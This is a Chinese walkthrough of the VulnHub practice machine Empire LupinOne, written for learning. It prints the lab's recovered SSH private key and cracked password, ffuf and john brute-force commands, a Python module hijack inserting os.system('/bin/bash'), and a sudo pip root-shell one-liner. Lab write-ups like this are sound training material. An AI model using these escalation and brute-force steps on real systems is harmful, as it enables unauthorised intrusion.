[渗透测试学习靶机03] vulnhub靶场 Empire LupinOne
Kali 的IP地址:192.168.127.139
靶机的IP地址:192.168.127.142
目录
一、信息搜集
1.1、扫描主机口
1.2、扫描端口
二、Web漏洞利用
2.1、目录遍历
2.2、破解私钥破解密码
2.3、尝试登陆
三、提权
3.1、提权到arsene
3.2、提权到root
一、信息搜集
1.1、扫描主机口
1.2、扫描端口
发现目标靶机开放了 22 (ssh) 、80(http)端口,我们默认访问80端口
http://192.168.127.142:80
发现页面没有啥东西,尝试看一下源代码
检查出现一句话" Its an easy box, dont give up. “意思是"它是一个简单的盒子,不要放弃。”
看另一个22端口是ssh的,现在没有账号密码无法使用。
二、Web漏洞利用
2.1、目录遍历
我们先扫描一下靶机的网站目录
发现有robots.txt,我们访问一下,发现有~myfiles文件夹,还有俩个名词,百度一下
试着访问~myfile这个文件夹,发现页面就是404,我们可以查看一下源代码,下面还有一个注释的话“你可以的,继续努力。”
让我们继续努力,就是暗示我们还有别的东西,紧接着我们尝试暴力破解,这里推荐使用ffuf工具暴力破解目录,kali自带的ffuf扫描速度贼快
ffuf -c -w /usr/share/wordlists/dirb/common.txt -u 'http://192.168.127.142/~FUZZ'
参数解释:
-c 有颜色输出
-w 指定字典
-u 指定暴力破解的目录,FUZZ 就是暴力破解的目录
看见是一个~secret文件,我们访问一下
访问:http://192.168.127.142/~secret/
Hello Friend, Im happy that you found my secret diretory, I created like this to share with you my create ssh private key file,Its hided somewhere here, so that hackers dont find it and crack my passphrase with fasttrack.I’m smart I know that.Any problem let me knowYour best friend icex64你好朋友,我很高兴你找到了我的秘密目录,我这样创建的,以与你分享我的ssh私钥文件,它就藏在这里的某个地方,这样黑客就不会找到它,用快速通道破解我的密码。我很聪明,我知道。有问题尽管来找我你最好的朋友icex64
我们猜测用户名是不是 icex64,用ssh私钥登陆,所以这里暴露了一个用户名 icex64 ,并且内容中提到该目录下有一个ssh私匙文件,这里可能需要暴力破解了
2.2、破解私钥破解密码
暴力破解文件继续使用 ffuf 破解,ffuz这个工具是可以自己选择后缀名的
尝试使用 kali 中的字典暴力破解
ffuf -u "http://192.168.127.142/~secret/.FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub,.html,.bak -mc 200
扫描出来一个文件,我们接着访问一下
发现是一串乱码,看起来很像base加密,我们直接去base全家桶一个一个解密
发现base58可以解出来
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jYmMAAAAGYmNyeXB0AAAAGAAAABDy33c2Fp
PBYANne4oz3usGAAAAEAAAAAEAAAIXAAAAB3NzaC1yc2EAAAADAQABAAACAQDBzHjzJcvk
9GXiytplgT9z/mP91NqOU9QoAwop5JNxhEfm/j5KQmdj/JB7sQ1hBotONvqaAdmsK+OYL9
H6NSb0jMbMc4soFrBinoLEkx894B/PqUTODesMEV/aK22UKegdwlJ9Arf+1Y48V86gkzS6
xzoKn/ExVkApsdimIRvGhsv4ZMmMZEkTIoTEGz7raD7QHDEXiusWl0hkh33rQZCrFsZFT7
J0wKgLrX2pmoMQC6o42OQJaNLBzTxCY6jU2BDQECoVuRPL7eJa0/nRfCaOrIzPfZ/NNYgu
/Dlf1CmbXEsCVmlD71cbPqwfWKGf3hWeEr0WdQhEuTf5OyDICwUbg0dLiKz4kcskYcDzH0
ZnaDsmjoYv2uLVLi19jrfnp/tVoLbKm39ImmV6Jubj6JmpHXewewKiv6z1nNE8mkHMpY5I
he0cLdyv316bFI8O+3y5m3gPIhUUk78C5n0VUOPSQMsx56d+B9H2bFiI2lo18mTFawa0pf
XdcBVXZkouX3nlZB1/Xoip71LH3kPI7U7fPsz5EyFIPWIaENsRmznbtY9ajQhbjHAjFClA
hzXJi4LGZ6mjaGEil+9g4U7pjtEAqYv1+3x8F+zuiZsVdMr/66Ma4e6iwPLqmtzt3UiFGb
4Ie1xaWQf7UnloKUyjLvMwBbb3gRYakBbQApoONhGoYQAAB1BkuFFctACNrlDxN180vczq
mXXs+ofdFSDieiNhKCLdSqFDsSALaXkLX8DFDpFY236qQE1poC+LJsPHJYSpZOr0cGjtWp
MkMcBnzD9uynCjhZ9ijaPY/vMY7mtHZNCY8SeoWAxYXToKy2cu/+pVyGQ76KYt3J0AT7wA
2OR3aMMk0o1LoozuyvOrB3cXMHh75zBfgQyAeeD7LyYG/b7z6zGvVxZca/g572CXxXSXlb
QOw/AR8ArhAP4SJRNkFoV2YRCe38WhQEp4R6k+34tK+kUoEaVAbwU+IchYyM8ZarSvHVpE
vFUPiANSHCZ/b+pdKQtBzTk5/VH/Jk3QPcH69EJyx8/gRE/glQY6z6nC6uoG4AkIl+gOxZ
0hWJJv0R1Sgrc91mBVcYwmuUPFRB5YFMHDWbYmZ0IvcZtUxRsSk2/uWDWZcW4tDskEVPft
rqE36ftm9eJ/nWDsZoNxZbjo4cF44PTF0WU6U0UsJW6mDclDko6XSjCK4tk8vr4qQB8OLB
QMbbCOEVOOOm9ru89e1a+FCKhEPP6LfwoBGCZMkqdOqUmastvCeUmht6a1z6nXTizommZy
x+ltg9c9xfeO8tg1xasCel1BluIhUKwGDkLCeIEsD1HYDBXb+HjmHfwzRipn/tLuNPLNjG
nx9LpVd7M72Fjk6lly8KUGL7z95HAtwmSgqIRlN+M5iKlB5CVafq0z59VB8vb9oMUGkCC5
VQRfKlzvKnPk0Ae9QyPUzADy+gCuQ2HmSkJTxM6KxoZUpDCfvn08Txt0dn7CnTrFPGIcTO
cNi2xzGu3wC7jpZvkncZN+qRB0ucd6vfJ04mcT03U5oq++uyXx8t6EKESa4LXccPGNhpfh
nEcgvi6QBMBgQ1Ph0JSnUB7jjrkjqC1q8qRNuEcWHyHgtc75JwEo5ReLdV/hZBWPD8Zefm
8UytFDSagEB40Ej9jbD5GoHMPBx8VJOLhQ+4/xuaairC7s9OcX4WDZeX3E0FjP9kq3QEYH
zcixzXCpk5KnVmxPul7vNieQ2gqBjtR9BA3PqCXPeIH0OWXYE+LRnG35W6meqqQBw8gSPw
n49YlYW3wxv1G3qxqaaoG23HT3dxKcssp+XqmSALaJIzYlpnH5Cmao4eBQ4jv7qxKRhspl
AbbL2740eXtrhk3AIWiaw1h0DRXrm2GkvbvAEewx3sXEtPnMG4YVyVAFfgI37MUDrcLO93
oVb4p/rHHqqPNMNwM1ns+adF7REjzFwr4/trZq0XFkrpCe5fBYH58YyfO/g8up3DMxcSSI
63RqSbk60Z3iYiwB8iQgortZm0UsQbzLj9i1yiKQ6OekRQaEGxuiIUA1SvZoQO9NnTo0SV
y7mHzzG17nK4lMJXqTxl08q26OzvdqevMX9b3GABVaH7fsYxoXF7eDsRSx83pjrcSd+t0+
t/YYhQ/r2z30YfqwLas7ltoJotTcmPqII28JpX/nlpkEMcuXoLDzLvCZORo7AYd8JQrtg2
Ays8pHGynylFMDTn13gPJTYJhLDO4H9+7dZy825mkfKnYhPnioKUFgqJK2yswQaRPLakHU
yviNXqtxyqKc5qYQMmlF1M+fSjExEYfXbIcBhZ7gXYwalGX7uX8vk8zO5dh9W9SbO4LxlI
8nSvezGJJWBGXZAZSiLkCVp08PeKxmKN2S1TzxqoW7VOnI3jBvKD3IpQXSsbTgz5WB07BU
mUbxCXl1NYzXHPEAP95Ik8cMB8MOyFcElTD8BXJRBX2I6zHOh+4Qa4+oVk9ZluLBxeu22r
VgG7l5THcjO7L4YubiXuE2P7u77obWUfeltC8wQ0jArWi26x/IUt/FP8Nq964pD7m/dPHQ
E8/oh4V1NTGWrDsK3AbLk/MrgROSg7Ic4BS/8IwRVuC+d2w1Pq+X+zMkblEpD49IuuIazJ
BHk3s6SyWUhJfD6u4C3N8zC3Jebl6ixeVM2vEJWZ2Vhcy+31qP80O/+Kk9NUWalsz+6Kt2
yueBXN1LLFJNRVMvVO823rzVVOY2yXw8AVZKOqDRzgvBk1AHnS7r3lfHWEh5RyNhiEIKZ+
wDSuOKenqc71GfvgmVOUypYTtoI527fiF/9rS3MQH2Z3l+qWMw5A1PU2BCkMso060OIE9P
5KfF3atxbiAVii6oKfBnRhqM2s4SpWDZd8xPafktBPMgN97TzLWM6pi0NgS+fJtJPpDRL8
vTGvFCHHVi4SgTB64+HTAH53uQC5qizj5t38in3LCWtPExGV3eiKbxuMxtDGwwSLT/DKcZ
Qb50sQsJUxKkuMyfvDQC9wyhYnH0/4m9ahgaTwzQFfyf7DbTM0+sXKrlTYdMYGNZitKeqB
1bsU2HpDgh3HuudIVbtXG74nZaLPTevSrZKSAOit+Qz6M2ZAuJJ5s7UElqrLliR2FAN+gB
ECm2RqzB3Huj8mM39RitRGtIhejpsWrDkbSzVHMhTEz4tIwHgKk01BTD34ryeel/4ORlsC
iUJ66WmRUN9EoVlkeCzQJwivI=
-----END OPENSSH PRIVATE KEY-----
我们将这个解密的文件保存下来(文件命名为ssh_txt),使用ssh密钥登陆,发现还需要一个密码,另外一个密码可以通过这个保存的文件密钥爆破出来
先用ssh2john.py 将ssh_txt更改为john可以识别的格式
命令:/usr/share/john/ssh2john.py ssh_txt > hash
之前~secret文件有叫我们使用fasttrack字典去爆破
然后利用john对 ssh_txt进行爆破。还原密码 该字典文件应该是kali上自带的字典.
john --wordlist=/usr/share/wordlists/fasttrack.txt hash
得到用户:icex64 的密码是:P@55w0rd!
2.3、尝试登陆
尝试使用私钥+密码登陆到系统中
尝试ssh登录( icex64、P@55w0rd!)
ssh icex64@192.168.127.142 -i ssh_txt
登陆成功,查看家目录,发现有一个文件user.txt,得到一个flag
三、提权
3.1、提权到arsene
执行sudo -l
发现arsene
用户可以免密以root身份执行一个py脚本
User icex64 may run the following commands on LupinOne:(arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py
紧接着我们查看一下这个文件,发现里面引入了一个包,我们可以看到heist.py脚本本身没有什么代码,但导入了一个模块:webbrowser
查看webbrowser.py脚本,发现有导入os模块
查看文件权限,发现可以修改
然后在上面插入一行进入bash的命令,插入os.system ("/bin/bash") 获取shell
重新切换shell,成功获取到arsene权限
sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
3.2、提权到root
再次执行sudo -l
发现可以以root身份免密执行pip,
然后我们使用pip进行提权,最终拿到flag,复制下面代码在 shell 中执行,成功提权,在 /root 目录下找到了flag(root.txt)
TF=$(mktemp -d)echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.pysudo pip install $TF
总结:
该靶机整体简单,重点在于ffuf 工具暴力破解目录,ssh2john工具的使用,使用 john 破解私钥,紧接着sudo:pip提权
[渗透测试学习靶机03] vulnhub靶场 Empire LupinOne相关推荐
- [渗透测试学习靶机02] vulnhub靶场 Empire: Breakout
kali IP地址为192.168.127.139 靶机 IP地址为192.168.127.141 目录 一.信息搜集 1.1.扫描主机口 1.2.端口扫描 1.3.目录扫描 2.枚举漏洞 2.1.枚 ...
- [渗透测试学习靶机05] vulnhub靶场 DarkHole: 2
kali IP地址为192.168.127.139 靶机 IP地址为192.168.127.144 目录 一.信息搜集 1.1.扫描主机口 1.2. 扫描端口 1.3.访问端口 1.4.扫描目录 二. ...
- 渗透测试学习之靶机DC-2
1.下载靶机 本篇文章是DC靶机系列的第二个篇,针对DC-2,建议感兴趣的读者从DC-1开始练习((26条消息) 渗透测试学习之靶机DC-1_xdbzdgx的博客-CSDN博客). DC-2的下载地址 ...
- 渗透测试学习笔记之案例二
0x00 前言 渗透是个持续的过程,不断地搜集信息,整理信息,以及利用信息,最终的目标就是拿到系统乃至整个网络的最高权限.在笔者看来,渗透测试与安全研究的最大不同就是前者擅长利用后者的研究成果并运用到 ...
- KALI LINUX渗透测试学习笔记
KALI LINUX渗透测试学习笔记 (苑房弘主讲) 第1章 课程介绍 任务1:Kali Linux渗透测试介绍.exe 安全问题的根源: 分层思想 只求功能实现 最大的威胁是人 渗透测试: 尝试挫败 ...
- Web渗透测试对靶机注入shell(phpMyAdmin)
Web渗透测试对靶机注入shell 文章目录 Web渗透测试对靶机注入shell 1.寻找目标信息 netdiscover扫描 nmap扫描 利用御剑后台进行扫描 2.对登录页面进行暴力破解 启动bu ...
- kali linux 渗透测试学习笔记——被动信息收集
kali linux 渗透测试学习笔记--linux 被动信息收集 被动信息收集 被动信息收集 公开渠道可获得的信息 已公开的信息,通过互联网等渠道去获得 与目标系统不产生直接交互 不对目标访问,扫描 ...
- 渗透测试学习总体概括
渗透测试学习总体概括 一.相关内容 1.编程语言基础知识语法的一个掌握,对于编程的本身来讲没有区别.2.把一个想法变成一个工具或者功能.3.安全工程师的软件工程能力较弱,也不影响安全的能力.java的 ...
- Android 渗透测试学习手册 翻译完成!
Android 渗透测试学习手册 中文版 原书:Learning Pentesting for Android Devices 译者:飞龙 在线阅读 PDF格式 EPUB格式 MOBI格式 代码仓库 ...
最新文章
- 云安全课程:云平台使用安全
- hdu4915 判断括号匹配
- 交换机的4种网络结构方式你知道是什么吗?
- sql 查询每月的销售金额
- 一文读懂DataOps
- 创业有很多种方式,方法,而且是形式多样
- 法拉利等12家车厂 将与苹果手机联网(图)
- visual studio可以开发app吗_做好APP定制开发的计划,可以让你的应用开发事半功倍...
- linux中的代码比对工具meld
- linux下制作dos启动u盘启动,linux dos启动盘怎样做
- TPO Official 01 Speaking
- Laravel重写或者覆盖vender下面的方法
- 聊天室系统测试用例设计及报告
- Java把html转成word
- H5 iOS微信端点击图片触发3Dtouch,导致无法扫描二维码【解决方法】
- 计算机联盟社团团活动总结,社团活动总结
- 网页ssl证书风险怎么解决
- sql server 通过参数获取两位数月份
- 利用vscode调试vue代码
- consistent hash